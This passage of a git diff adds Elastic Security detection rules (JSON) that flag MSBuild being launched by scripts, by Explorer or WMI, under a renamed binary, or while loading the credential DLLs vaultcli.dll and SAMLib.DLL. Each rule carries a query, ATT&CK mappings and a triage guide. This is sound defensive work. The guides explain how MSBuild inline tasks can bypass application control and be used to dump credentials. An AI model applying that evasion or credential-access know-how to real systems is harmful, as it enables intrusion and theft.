"https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 208 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_209.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_209.json new file mode 100644 index 00000000000..0cc0ce3519a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_209.json @@ -0,0 +1,142 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started by a script or the Windows command interpreter. This behavior is unusual and is sometimes used by malicious payloads.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "history_window_start": "now-14d", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started by a Script Process", + "new_terms_fields": [ + "host.id", + "user.name", + "process.command_line" + ], + "query": "host.os.type:windows and event.category:process and event.type:start and (\n process.name.caseless:\"msbuild.exe\" or process.pe.original_file_name:\"MSBuild.exe\") and \n process.parent.name:(\"cmd.exe\" or \"powershell.exe\" or \"pwsh.exe\" or \"powershell_ise.exe\" or \"cscript.exe\" or\n \"wscript.exe\" or \"mshta.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.name.caseless", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + }, + { + "id": "T1059.003", + "name": "Windows Command Shell", + "reference": "https://attack.mitre.org/techniques/T1059/003/" + }, + { + "id": "T1059.005", + "name": "Visual Basic", + "reference": "https://attack.mitre.org/techniques/T1059/005/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 209 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae2_209", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_109.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_109.json new file mode 100644 index 00000000000..dc228d27682 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_109.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started by Explorer or the WMI (Windows Management Instrumentation) subsystem. This behavior is unusual and is sometimes used by malicious payloads.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started by a System Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"MSBuild.exe\" and\n process.parent.name : (\"explorer.exe\", \"wmiprvse.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_110.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_110.json new file mode 100644 index 00000000000..f303c1c5469 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_110.json @@ -0,0 +1,106 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started by Explorer or the WMI (Windows Management Instrumentation) subsystem. This behavior is unusual and is sometimes used by malicious payloads.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Started by a System Process", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.name : \"MSBuild.exe\" and\n process.parent.name : (\"explorer.exe\", \"wmiprvse.exe\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae3_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_111.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_111.json new file mode 100644 index 00000000000..7d649c1e25e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_111.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Using an Alternate Name", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + }, + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_112.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_112.json new file mode 100644 index 00000000000..64d5d2099d7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_112.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, was started after being renamed. This is uncommon behavior and may indicate an attempt to run unnoticed or undetected.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Build Engine Using an Alternate Name", + "note": "## Triage and analysis\n\n### Investigating Microsoft Build Engine Using an Alternate Name\n\nThe OriginalFileName attribute of a PE (Portable Executable) file is a metadata field that contains the original name of the executable file when compiled or linked. By using this attribute, analysts can identify renamed instances that attackers can use with the intent of evading detections, application allowlists, and other security protections.\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software, and can be abused to proxy execution of code.\n\nThis rule checks for renamed instances of MSBuild, which can indicate an attempt of evading detections, application allowlists, and other security protections.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.pe.original_file_name == \"MSBuild.exe\" and\n not process.name : \"MSBuild.exe\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.003", + "name": "Rename System Utilities", + "reference": "https://attack.mitre.org/techniques/T1036/003/" + } + ] + }, + { + "id": "T1127", + "name": "Trusted Developer Utilities Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1127/", + "subtechnique": [ + { + "id": "T1127.001", + "name": "MSBuild", + "reference": "https://attack.mitre.org/techniques/T1127/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae4_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_109.json b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_109.json new file mode 100644 index 00000000000..6f71e1d16a7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9d110cb3-5f4b-4c9a-b9f5-53f0a1707ae5_109.json @@ -0,0 +1,154 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An instance of MSBuild, the Microsoft Build Engine, loaded DLLs (dynamically linked libraries) responsible for Windows credential management. This technique is sometimes used for credential dumping.", + "false_positives": [ + "The Build Engine is commonly used by Windows developers but use by non-engineers is unusual." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via Trusted Developer Utility", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Trusted Developer Utility\n\nThe Microsoft Build Engine is a platform for building applications. This engine, also known as MSBuild, provides an XML schema for a project file that controls how the build platform processes and builds software.\n\nAdversaries can abuse MSBuild to proxy the execution of malicious code. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# or Visual Basic code to be inserted into an XML project file. MSBuild will compile and execute the inline task. `MSBuild.exe` is a signed Microsoft binary, and the execution of code using it can bypass application control defenses that are configured to allow `MSBuild.exe` execution.\n\nThis rule looks for the MSBuild process loading `vaultcli.dll` or `SAMLib.DLL`, which indicates the execution of credential access activities.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine the command line to identify the `.csproj` file location.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id\n [process where host.os.type == \"windows\" and event.type == \"start\" and (process.name : \"MSBuild.exe\" or process.pe.original_file_name == \"MSBuild.exe\")]\n [any where host.os.type == \"windows\" and (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (?dll.name : (\"vaultcli.dll\", \"SAMLib.DLL\") or file.name : (\"vaultcli.dll\", \"SAMLib.DLL\"))]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + 